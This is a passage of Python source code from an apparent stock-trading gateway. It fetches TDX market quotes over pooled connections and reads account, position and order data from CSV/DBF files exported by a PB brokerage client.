ping行情服务器
:param ip:
:param port:
:param type_:
:return:
"""
apix = TdxHq_API()
__time1 = datetime.now()
try:
with apix.connect(ip, port):
if apix.get_security_count(TDXParams.MARKET_SZ) > 9000: # 0:深市 股票数量 = 9260
_timestamp = datetime.now() - __time1
self.gateway.write_log('服务器{}:{},耗时:{}'.format(ip, port, _timestamp))
return _timestamp
else:
self.gateway.write_log(u'该服务器IP {}无响应'.format(ip))
return timedelta(9, 9, 0)
except:
self.gateway.write_error(u'tdx ping服务器,异常的响应{}'.format(ip))
return timedelta(9, 9, 0)
def select_best_ip(self):
"""
选择行情服务器
:return:
"""
self.gateway.write_log(u'选择通达信股票行情服务器')
data_future = [self.ping(x.get('ip'), x.get('port')) for x in self.ip_list]
best_future_ip = self.ip_list[data_future.index(min(data_future))]
self.gateway.write_log(u'选取 {}:{}'.format(
best_future_ip['ip'], best_future_ip['port']))
return best_future_ip
def connect(self, n=3):
"""
连接通达讯行情服务器
:param n:
:return:
"""
if self.connection_status:
for api in self.api_dict:
if api is not None or getattr(api, "client", None) is not None:
self.gateway.write_log(u'当前已经连接,不需要重新连接')
return
self.gateway.write_log(u'开始通达信行情服务器')
if len(self.symbol_dict) == 0:
self.gateway.write_error(f'本地没有股票信息的缓存配置文件')
else:
self.cov_contracts()
# 选取最佳服务器
if self.best_ip['ip'] is None and self.best_ip['port'] is None:
self.best_ip = self.select_best_ip()
# 创建n个api连接对象实例
for i in range(n):
try:
api = TdxHq_API(heartbeat=True, auto_retry=True, raise_exception=True)
api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = api.get_security_count(TDXParams.MARKET_SZ)
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'创建第{}个tdx连接'.format(i + 1))
self.api_dict[i] = api
self.last_tick_dt[i] = datetime.now()
self.connection_status = True
self.security_count = c
# if len(symbol_name_map) == 0:
# self.get_stock_list()
except Exception as ex:
self.gateway.write_error(u'连接服务器tdx[{}]异常:{},{}'.format(i, str(ex), traceback.format_exc()))
return
# 创建连接池,每个连接都调用run方法
self.pool = Pool(n)
self.pool.map_async(self.run, range(n))
# 设置上层的连接状态
self.gateway.tdxConnected = True
def reconnect(self, i):
"""
重连
:param i:
:return:
"""
try:
self.best_ip = self.select_best_ip()
api = TdxHq_API(heartbeat=True, auto_retry=True)
api.connect(self.best_ip['ip'], self.best_ip['port'])
# 尝试获取市场合约统计
c = api.get_security_count(TDXParams.MARKET_SZ)
if c is None or c < 10:
err_msg = u'该服务器IP {}/{}无响应'.format(self.best_ip['ip'], self.best_ip['port'])
self.gateway.write_error(err_msg)
else:
self.gateway.write_log(u'重新创建第{}个tdx连接'.format(i + 1))
self.api_dict[i] = api
sleep(1)
except Exception as ex:
self.gateway.write_error(u'重新连接服务器tdx[{}]异常:{},{}'.format(i, str(ex), traceback.format_exc()))
return
def close(self):
"""退出API"""
self.connection_status = False
# 设置上层的连接状态
self.gateway.tdxConnected = False
if self.pool is not None:
self.pool.close()
self.pool.join()
def subscribe(self, req):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(req.symbol)
if '.' in vn_symbol:
vn_symbol = vn_symbol.split('.')[0]
self.gateway.write_log(u'通达信行情订阅 {}'.format(str(vn_symbol)))
tdx_symbol = vn_symbol # [0:-2] + 'L9'
tdx_symbol = tdx_symbol.upper()
self.gateway.write_log(u'{}=>{}'.format(vn_symbol, tdx_symbol))
self.symbol_vn_dict[tdx_symbol] = vn_symbol
if tdx_symbol not in self.registed_symbol_set:
self.registed_symbol_set.add(tdx_symbol)
# 查询股票信息
self.qry_instrument(vn_symbol)
self.check_status()
def check_status(self):
# self.gateway.write_log(u'检查tdx接口状态')
if len(self.registed_symbol_set) == 0:
return True
# 若还没有启动连接,就启动连接
over_time = [((datetime.now() - dt).total_seconds() > 60) for dt in self.last_tick_dt.values()]
if not self.connection_status or len(self.api_dict) == 0 or any(over_time):
self.gateway.write_log(u'tdx还没有启动连接,就启动连接')
self.close()
self.pool = None
self.api_dict = {}
pool_cout = getattr(self.gateway, 'tdx_pool_count', 3)
self.connect(pool_cout)
# self.gateway.write_log(u'tdx接口状态正常')
def qry_instrument(self, symbol):
"""
查询/更新股票信息
:return:
"""
if not self.connection_status:
return
api = self.api_dict.get(0)
if api is None:
self.gateway.write_log(u'取不到api连接,更新合约信息失败')
return
# TODO: 取得股票的中文名
market_code = get_tdx_market_code(symbol)
api.to_df(api.get_finance_info(market_code, symbol))
# 如果有预定的订阅合约,提前订阅
# if len(all_contacts) > 0:
# cur_folder = os.path.dirname(__file__)
# export_file = os.path.join(cur_folder,'contracts.csv')
# if not os.path.exists(export_file):
# df = pd.DataFrame(all_contacts)
# df.to_csv(export_file)
def cov_contracts(self):
"""转换本地缓存=》合约信息推送"""
for symbol_marketid, info in self.symbol_dict.items():
symbol, market_id = symbol_marketid.split('_')
exchange = info.get('exchange', '')
if len(exchange) == 0:
continue
vn_exchange_str = get_stock_exchange(symbol)
if exchange != vn_exchange_str:
continue
exchange = Exchange(exchange)
if info['stock_type'] == 'stock_cn':
product = Product.EQUITY
elif info['stock_type'] in ['bond_cn', 'cb_cn']:
product = Product.BOND
elif info['stock_type'] == 'index_cn':
product = Product.INDEX
elif info['stock_type'] == 'etf_cn':
product = Product.ETF
else:
product = Product.EQUITY
volume_tick = info['volunit']
if symbol.startswith('688'):
volume_tick = 200
contract = ContractData(
gateway_name=self.gateway_name,
symbol=symbol,
exchange=exchange,
name=info['name'],
product=product,
pricetick=round(0.1 ** info['decimal_point'], info['decimal_point']),
size=1,
min_volume=volume_tick,
margin_rate=1
)
if product != Product.INDEX:
# 缓存 合约 =》 中文名
symbol_name_map.update({contract.symbol: contract.name})
# 缓存代码和交易所的印射关系
symbol_exchange_map[contract.symbol] = contract.exchange
self.contract_dict.update({contract.symbol: contract})
self.contract_dict.update({contract.vt_symbol: contract})
# 推送
self.gateway.on_contract(contract)
def get_stock_list(self):
"""股票所有的code&name列表"""
api = self.api_dict.get(0)
if api is None:
self.gateway.write_log(u'取不到api连接,更新合约信息失败')
return None
self.gateway.write_log(f'查询所有的股票信息')
data = pd.concat(
[pd.concat([api.to_df(api.get_security_list(j, i * 1000)).assign(sse='sz' if j == 0 else 'sh').set_index(
['code', 'sse'], drop=False) for i in range(int(api.get_security_count(j) / 1000) + 1)], axis=0) for j
in range(2)], axis=0)
sz = data.query('sse=="sz"')
sh = data.query('sse=="sh"')
sz = sz.assign(sec=sz.code.apply(get_stock_type_sz))
sh = sh.assign(sec=sh.code.apply(get_stock_type_sh))
temp_df = pd.concat([sz, sh]).query('sec in ["stock_cn","etf_cn","bond_cn","cb_cn"]').sort_index().assign(
name=data['name'].apply(lambda x: str(x)[0:6]))
hq_codelist = temp_df.loc[:, ['code', 'name']].set_index(['code'], drop=False)
for i in range(0, len(temp_df)):
row = temp_df.iloc[i]
if row['sec'] == 'etf_cn':
product = Product.ETF
elif row['sec'] in ['bond_cn', 'cb_cn']:
product = Product.BOND
else:
product = Product.EQUITY
volume_tick = 100 if product != Product.BOND else 10
if row['code'].startswith('688'):
volume_tick = 200
contract = ContractData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=Exchange.SSE if row['sse'] == 'sh' else Exchange.SZSE,
name=row['name'],
product=product,
pricetick=round(0.1 ** row['decimal_point'], row['decimal_point']),
size=1,
min_volume=volume_tick,
margin_rate=1
)
# 缓存 合约 =》 中文名
symbol_name_map.update({contract.symbol: contract.name})
# 缓存代码和交易所的印射关系
symbol_exchange_map[contract.symbol] = contract.exchange
self.contract_dict.update({contract.symbol: contract})
self.contract_dict.update({contract.vt_symbol: contract})
# 推送
self.gateway.on_contract(contract)
return hq_codelist
def run(self, i):
"""
版本1:Pool内得线程,持续运行,每个线程从queue中获取一个请求并处理
版本2:Pool内线程,从订阅合约集合中,取出符合自己下标 mode n = 0的合约,并发送请求
:param i:
:return:
"""
# 版本2:
try:
api_count = len(self.api_dict)
last_dt = datetime.now()
self.gateway.write_log(u'开始运行tdx[{}],{}'.format(i, last_dt))
while self.connection_status:
symbols = set()
for idx, tdx_symbol in enumerate(list(self.registed_symbol_set)):
# self.gateway.write_log(u'tdx[{}], api_count:{}, idx:{}, tdx_symbol:{}'.format(i, api_count, idx, tdx_symbol))
if idx % api_count == i:
try:
symbols.add(tdx_symbol)
self.processReq(tdx_symbol, i)
except BrokenPipeError as bex:
self.gateway.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), i))
self.reconnect(i)
sleep(5)
break
except Exception as ex:
self.gateway.write_error(
u'tdx[{}] exception:{},{}'.format(i, str(ex), traceback.format_exc()))
# api = self.api_dict.get(i,None)
# if api is None or getattr(api,'client') is None:
self.gateway.write_error(u'重试重连tdx[{}]'.format(i))
print(u'重试重连tdx[{}]'.format(i), file=sys.stderr)
self.reconnect(i)
# self.gateway.write_log(u'tdx[{}] sleep'.format(i))
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.gateway.write_log('tdx[{}] check point. {}, process symbols:{}'.format(i, dt, symbols))
last_dt = dt
except Exception as ex:
self.gateway.write_error(u'tdx[{}] pool.run exception:{},{}'.format(i, str(ex), traceback.format_exc()))
self.gateway.write_error(u'tdx[{}] {}退出'.format(i, datetime.now()))
def processReq(self, req, i):
"""
处理行情信息ticker请求
:param req:
:param i:
:return:
"""
symbol = req
if '.' in symbol:
symbol, exchange = symbol.split('.')
if exchange == 'SZSE':
market_code = 0
else:
market_code = 1
else:
market_code = get_tdx_market_code(symbol)
exchange = get_stock_exchange(symbol)
exchange = Exchange(exchange)
api = self.api_dict.get(i, None)
if api is None:
self.gateway.write_log(u'tdx[{}] Api is None'.format(i))
raise Exception(u'tdx[{}] Api is None'.format(i))
symbol_config = self.symbol_dict.get('{}_{}'.format(symbol, market_code), {})
decimal_point = symbol_config.get('decimal_point', 2)
# self.gateway.write_log(u'tdx[{}] get_instrument_quote:({},{})'.format(i,self.symbol_market_dict.get(symbol),symbol))
rt_list = api.get_security_quotes([(market_code, symbol)])
if rt_list is None or len(rt_list) == 0:
self.gateway.write_log(u'tdx[{}]: rt_list为空'.format(i))
return
# else:
# self.gateway.write_log(u'tdx[{}]: rt_list数据:{}'.format(i, rt_list))
if i in self.last_tick_dt:
self.last_tick_dt[i] = datetime.now()
# <class 'list'>: [OrderedDict([
# ('market', 0),
# ('code', '000001'),
# ('active1', 1385),
# ('price', 13.79),
# ('last_close', 13.69),
# ('open', 13.65), ('high', 13.81), ('low', 13.56),
# ('reversed_bytes0', 10449822), ('reversed_bytes1', -1379),
# ('vol', 193996), ('cur_vol', 96),
# ('amount', 264540864.0),
# ('s_vol', 101450),
# ('b_vol', 92546),
# ('reversed_bytes2', 0), ('reversed_bytes3', 17185),
# ('bid1', 13.79), ('ask1', 13.8), ('bid_vol1', 877), ('ask_vol1', 196),
# ('bid2', 13.78), ('ask2', 13.81), ('bid_vol2', 2586), ('ask_vol2', 1115),
# ('bid3', 13.77), ('ask3', 13.82), ('bid_vol3', 1562), ('ask_vol3', 807),
# ('bid4', 13.76), ('ask4', 13.83), ('bid_vol4', 211), ('ask_vol4', 711),
# ('bid5', 13.75), ('ask5', 13.84), ('bid_vol5', 1931), ('ask_vol5', 1084),
# ('reversed_bytes4', (385,)), ('reversed_bytes5', 1), ('reversed_bytes6', -41), ('reversed_bytes7', -29), ('reversed_bytes8', 1), ('reversed_bytes9', 0.88),
# ('active2', 1385)])]
dt = datetime.now()
for d in list(rt_list):
# 忽略成交量为0的无效单合约tick数据
if d.get('cur_vol', 0) <= 0:
# self.gateway.write_log(u'忽略成交量为0的无效单合约tick数据:')
continue
code = d.get('code', None)
if symbol != code and code is not None:
self.gateway.write_log(u'忽略合约{} {} 不一致的tick数据:{}'.format(symbol, d.get('code'), rt_list))
continue
tick = TickData(
gateway_name=self.gateway_name,
symbol=symbol,
exchange=exchange,
datetime=dt,
date=dt.strftime('%Y-%m-%d'),
time=dt.strftime('%H:%M:%S')
)
if decimal_point > 2:
tick.pre_close = round(d.get('last_close') / (10 ** (decimal_point - 2)), decimal_point)
tick.high_price = round(d.get('high') / (10 ** (decimal_point - 2)), decimal_point)
tick.open_price = round(d.get('open') / (10 ** (decimal_point - 2)), decimal_point)
tick.low_price = round(d.get('low') / (10 ** (decimal_point - 2)), decimal_point)
tick.last_price = round(d.get('price') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_price_1 = round(d.get('bid1') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_1 = d.get('bid_vol1')
tick.ask_price_1 = round(d.get('ask1') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_1 = d.get('ask_vol1')
if d.get('bid5'):
tick.bid_price_2 = round(d.get('bid2') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_2 = d.get('bid_vol2')
tick.ask_price_2 = round(d.get('ask2') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_2 = d.get('ask_vol2')
tick.bid_price_3 = round(d.get('bid3') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_3 = d.get('bid_vol3')
tick.ask_price_3 = round(d.get('ask3') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_3 = d.get('ask_vol3')
tick.bid_price_4 = round(d.get('bid4') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_4 = d.get('bid_vol4')
tick.ask_price_4 = round(d.get('ask4') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_4 = d.get('ask_vol4')
tick.bid_price_5 = round(d.get('bid5') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_5 = d.get('bid_vol5')
tick.ask_price_5 = round(d.get('ask5') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_5 = d.get('ask_vol5')
else:
tick.pre_close = d.get('last_close')
tick.high_price = d.get('high')
tick.open_price = d.get('open')
tick.low_price = d.get('low')
tick.last_price = d.get('price')
tick.bid_price_1 = d.get('bid1')
tick.bid_volume_1 = d.get('bid_vol1')
tick.ask_price_1 = d.get('ask1')
tick.ask_volume_1 = d.get('ask_vol1')
if d.get('bid5'):
tick.bid_price_2 = d.get('bid2')
tick.bid_volume_2 = d.get('bid_vol2')
tick.ask_price_2 = d.get('ask2')
tick.ask_volume_2 = d.get('ask_vol2')
tick.bid_price_3 = d.get('bid3')
tick.bid_volume_3 = d.get('bid_vol3')
tick.ask_price_3 = d.get('ask3')
tick.ask_volume_3 = d.get('ask_vol3')
tick.bid_price_4 = d.get('bid4')
tick.bid_volume_4 = d.get('bid_vol4')
tick.ask_price_4 = d.get('ask4')
tick.ask_volume_4 = d.get('ask_vol4')
tick.bid_price_5 = d.get('bid5')
tick.bid_volume_5 = d.get('bid_vol5')
tick.ask_price_5 = d.get('ask5')
tick.ask_volume_5 = d.get('ask_vol5')
tick.volume = d.get('vol', 0)
tick.open_interest = d.get('amount', 0)
# 修正毫秒
last_tick = self.symbol_tick_dict.get(symbol, None)
if (last_tick is not None) and tick.datetime.replace(microsecond=0) == last_tick.datetime:
# 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
tick.datetime = tick.datetime.replace(microsecond=500)
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
else:
tick.datetime = tick.datetime.replace(microsecond=0)
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = tick.datetime.strftime('%Y-%m-%d')
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
# 排除非交易时间得tick
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
return
elif tick.datetime.hour == 9 and tick.datetime.minute <= 25:
return
elif tick.datetime.hour == 15 and tick.datetime.minute >= 0:
return
self.symbol_tick_dict[symbol] = tick
self.gateway.on_tick(tick)
class PbTdApi(object):
def __init__(self, gateway: PbGateway):
""""""
super().__init__()
self._active = False
self.gateway: PbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.userid: str = "" # 资金账号
self.product_id: str = "" # 产品编号(在pb客户端看到)
self.unit_id: str = "1" # 单元编号(在pb客户端设置),缺省是1
self.holder_ids = {}
self.order_folder = "" # 埋单csv文件所在目录
self.account_folder = "" # 账号导出csv所在目录
# 缓存了当前交易日
self.trading_day = datetime.now().strftime('%Y-%m-%d')
self.trading_date = self.trading_day.replace('-', '')
self.connect_status: bool = False
self.login_status: bool = False
# 所有交易
self.trades = {} # tradeid: trade
# 本gateway以外的委托
self.orders = {} # sys_orderid: order
# 未获取本地更新检查的orderid清单
self.unchecked_orderids = []
def close(self):
pass
def connect(self, user_id, order_folder, account_folder, product_id, unit_id="1", holder_ids={}):
"""连接"""
self.userid = user_id
self.order_folder = order_folder
self.product_id = product_id
self.unit_id = unit_id
self.holder_ids = holder_ids
if os.path.exists(self.order_folder):
self.connect_status = True
self.account_folder = account_folder
if os.path.exists(self.account_folder):
self.login_status = True
# 仅查询一次
self.query_trades()
# 仅全局查询一次
self.query_orders()
# 首次连接时,优先全部撤单
self.cancel_all()
if self.gateway.file_type == 'dbf':
self.gateway.query_functions.append(self.query_update_trades_dbf)
self.gateway.query_functions.append(self.query_update_orders_dbf)
def get_data(self, file_path, field_names=None):
"""获取文件内容"""
if not os.path.exists(file_path):
return None
results = []
try:
with open(file=file_path, mode='r', encoding='gbk', ) as f:
reader = csv.DictReader(f=f, fieldnames=field_names, delimiter=",")
for row in reader:
results.append(row)
except Exception as ex:
self.gateway.write_error(f'读取csv文件数据异常:{str(ex)}')
return results
def query_account(self):
if self.gateway.file_type == 'dbf':
self.query_account_dbf()
else:
self.query_account_csv()
def query_account_dbf(self):
"""获取资金账号信息"""
# dbf 文件名
account_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
try:
# dbf => 资金帐号信息
self.gateway.write_log(f'扫描资金帐号信息:{account_dbf}')
table = dbf.Table(account_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# ["资金账户"]
if str(data.zjzh).strip() != self.userid:
continue
account = AccountData(
gateway_name=self.gateway_name,
accountid=self.userid,
balance=float(data.dyjz), # ["单元净值"]
frozen=float(data.dyjz) - float(data.kyye), # data["可用余额"]
currency="人民币",
trading_day=self.trading_day
)
self.gateway.on_account(account)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描资金帐号异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_account_csv(self):
"""获取资金账号信息"""
if self.gateway.pb_version == '2018':
# 账号的文件
accounts_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
else:
# 账号的文件
accounts_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
# csv => 所有账号资金清单
account_list = self.get_data(accounts_csv)
if not account_list:
return
for data in account_list:
if data["资金账户"] != self.userid:
continue
account = AccountData(
gateway_name=self.gateway_name,
accountid=self.userid,
balance=float(data["单元净值"]),
frozen=float(data["单元净值"]) - float(data["可用余额"]),
currency="人民币",
trading_day=self.trading_day
)
self.gateway.on_account(account)
def query_position(self):
"""获取持仓信息"""
if self.gateway.file_type == 'dbf':
self.query_position_dbf()
else:
self.query_position_csv()
def query_position_dbf(self):
"""从dbf文件获取持仓信息"""
# fields:['zqgs', 'zjzh', 'zhlx', 'zqdm', 'zqmc', 'zqlb', 'zxjg', 'cbjg', 'cpbh', 'cpmc', 'dybh', 'dymc', 'ccsl', 'dqcb', 'kysl', 'jjsz', 'qjsz', 'zqlx'
# , 'jysc', 'jybz', 'dryk', 'ljyk', 'fdyk', 'fyl', 'ykl', 'tzlx', 'gddm', 'mrsl', 'mcsl', 'mrje', 'mcje', 'zdf', 'bbj', 'qjcb', 'gtcb', 'gtyk', 'zgb']
# dbf 文件名
position_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
try:
# dbf => 股票持仓信息
self.gateway.write_log(f'扫描股票持仓信息:{position_dbf}')
table = dbf.Table(position_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip() != self.userid:
continue
symbol = str(data.zqdm).strip() #["证券代码"]
# symbol => Exchange
exchange = symbol_exchange_map.get(symbol, None)
if not exchange:
exchange_str = get_stock_exchange(code=symbol)
if len(exchange_str) > 0:
exchange = Exchange(exchange_str)
symbol_exchange_map.update({symbol: exchange})
name = symbol_name_map.get(symbol, None)
if not name:
name = data.zqmc # ["证券名称"]
symbol_name_map.update({symbol: name})
position = PositionData(
gateway_name=self.gateway_name,
accountid=self.userid,
symbol=symbol, #["证券代码"],
exchange=exchange,
direction=Direction.NET,
name=name,
volume=int(data.ccsl), # ["持仓数量"]
yd_volume=int(data.kysl),# ["可用数量"]
price=float(data.cbjg), # ["成本价"]
cur_price=float(data.zxjg), # ["最新价"]
pnl=float(data.fdyk), # ["浮动盈亏"]
holder_id=str(data.gddm).strip() #["股东"]
)
self.gateway.on_position(position)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票持仓异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_position_csv(self):
"""从csv获取持仓信息"""
if self.gateway.pb_version == '2018':
# 持仓的文件
positions_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
else:
# 持仓的文件
positions_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
# csv => 所有持仓清单
position_list = self.get_data(positions_csv)
if not position_list:
return
for data in position_list:
if data["资金账户"] != self.userid:
continue
symbol = data["证券代码"]
# symbol => Exchange
exchange = symbol_exchange_map.get(symbol, None)
if not exchange:
exchange_str = get_stock_exchange(code=symbol)
if len(exchange_str) > 0:
exchange = Exchange(exchange_str)
symbol_exchange_map.update({symbol: exchange})
name = symbol_name_map.get(symbol, None)
if not name:
name = data["证券名称"]
symbol_name_map.update({symbol: name})
position = PositionData(
gateway_name=self.gateway_name,
accountid=self.userid,
symbol=data["证券代码"],
exchange=exchange,
direction=Direction.NET,
name=name,
volume=int(data["持仓数量"]),
yd_volume=int(data["可用数量"]),
price=float(data["成本价"]),
cur_price=float(data["最新价"]),
pnl=float(data["浮动盈亏"]),
holder_id=data["股东"]
)
self.gateway.on_position(position)
def query_orders(self):
if self.gateway.file_type == 'dbf':
self.query_orders_dbf()
else:
self.query_orders_csv()
def query_orders_dbf(self):
"""dbf文件获取所有委托"""
# fields:['zqgs', 'zjzh', 'zhlx', 'cpbh', 'cpmc', 'dybh', 'dymc', 'wtph', 'wtxh', 'zqdm', 'zqmc', 'wtfx', 'jglx', 'wtjg', 'wtsl', 'wtzt', 'cjsl', 'wtje'
# , 'cjjj', 'cdsl', 'jysc', 'fdyy', 'wtly', 'wtrq', 'wtsj', 'jybz']
orders_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
try:
# dbf => 股票委托信息
self.gateway.write_log(f'扫描股票委托信息:{orders_dbf}')
table = dbf.Table(orders_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip() != self.userid: # ["资金账户"]
continue
sys_orderid = str(data.wtxh).strip() # ["委托序号"]
# 检查是否存在本地order_manager缓存中
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
order_date = str(data.wtrq).strip() #["委托日期"]
order_time = str(data.wtsj).strip() #["委托时间"]
order_status = STATUS_NAME2VT.get(str(data.wtzt).strip()) # ["委托状态"]
# 检查是否存在本地orders缓存中(系统级别的委托单)
sys_order = self.orders.get(sys_orderid, None)
if order is not None:
continue
# 委托单不存在本地映射库,说明是其他地方下的单子,不是通过本接口下单
if sys_order is None:
# 不处理以下状态
if order_status in [Status.SUBMITTING, Status.REJECTED, Status.CANCELLED, Status.CANCELLING]:
continue
order_dt = datetime.strptime(f'{order_date} {order_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip()) # ["委托方向"]
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
sys_order = OrderData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(), # ["证券代码"]
exchange=EXCHANGE_NAME2VT.get(str(data.jysc).strip()), # ["交易市场"]
orderid=sys_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_NAME2VT.get(str(data.jglx).strip(), OrderType.LIMIT), # ["价格类型"]
direction=direction,
offset=offset,
price=float(data.wtjg), # ["委托价格"]
volume=float(data.wtsl), # ["委托数量"]
traded=float(data.cjsl), # ["成交数量"]
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
# 直接发出订单更新事件
self.gateway.write_log(f'账号订单查询,新增:{sys_order.__dict__}')
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.on_order(sys_order)
continue
# 存在账号缓存,判断状态是否更新
else:
# 暂不处理,交给XHPT_WTCX模块处理
if sys_order.status != order_status or sys_order.traded != float(data.cjsl): # ["成交数量"]
sys_order.traded = float(data.cjsl) # ["成交数量"]
sys_order.status = order_status
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.write_log(f'账号订单查询,更新:{sys_order.__dict__}')
self.gateway.on_order(sys_order)
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票委托异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_orders_csv(self):
"""获取所有委托"""
# 所有委托的文件
if self.gateway.pb_version == '2018':
orders_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
else:
orders_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
# csv => 所有委托记录
order_list = self.get_data(orders_csv)
if not order_list:
return
for data in order_list:
if data["资金账户"] != self.userid:
continue
sys_orderid = str(data["委托序号"])
# 检查是否存在本地order_manager缓存中
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
order_date = data["委托日期"]
order_time = data["委托时间"]
order_status = STATUS_NAME2VT.get(data["委托状态"])
# 检查是否存在本地orders缓存中(系统级别的委托单)
sys_order = self.orders.get(sys_orderid, None)
if order is not None:
continue
# 委托单不存在本地映射库,说明是其他地方下的单子,不是通过本接口下单
if sys_order is None:
# 不处理以下状态
if order_status in [Status.SUBMITTING, Status.REJECTED, Status.CANCELLED, Status.CANCELLING]:
continue
order_dt = datetime.strptime(f'{order_date} {order_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(data["委托方向"])
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
sys_order = OrderData(
gateway_name=self.gateway_name,
symbol=data["证券代码"],
exchange=EXCHANGE_NAME2VT.get(data["交易市场"]),
orderid=sys_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_NAME2VT.get(data["价格类型"], OrderType.LIMIT),
direction=direction,
offset=offset,
price=float(data["委托价格"]),
volume=float(data["委托数量"]),
traded=float(data["成交数量"]),
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
# 直接发出订单更新事件
self.gateway.write_log(f'账号订单查询,新增:{sys_order.__dict__}')
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.on_order(sys_order)
continue
# 存在账号缓存,判断状态是否更新
else:
# 暂不处理,交给XHPT_WTCX模块处理
if sys_order.status != order_status or sys_order.traded != float(data["成交数量"]):
sys_order.traded = float(data["成交数量"])
sys_order.status = order_status
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.write_log(f'账号订单查询,更新:{sys_order.__dict__}')
self.gateway.on_order(sys_order)
continue
def query_update_orders_dbf(self):
"""扫描批量下单的委托查询(dbf文件格式)"""
# XHPT_WTCX委托的dbf文件
orders_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
# dbf => 所有委托记录
try:
# dbf => 所有成交记录
self.gateway.write_log(f'扫描所有委托查询:{orders_dbf}')
table = dbf.Table(orders_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# 第三方系统自定义号
local_orderid = str(data.wbzdyxh)
if len(local_orderid) == 0:
self.gateway.write_log(f'获取不到本地委托号:{print_dict(data.__dict__)}')
continue
# 如果不足8位,自动补充0
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
# 委托状态=>
order_status = STATUS_PB2VT.get(str(data.wtzt))
# 恒生平台返回的委托序号
sys_orderid = str(data.wtxh)
if len(sys_orderid) == 0:
self.gateway.write_log(f'获取不到恒生平台的委托序号:{print_dict(data.__dict__)}')
continue
# 通过本地委托编号,检查是否存在本地订单列表中
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
if order is None:
self.gateway.write_log(f'本地委托编号{local_orderid}不在本地订单中')
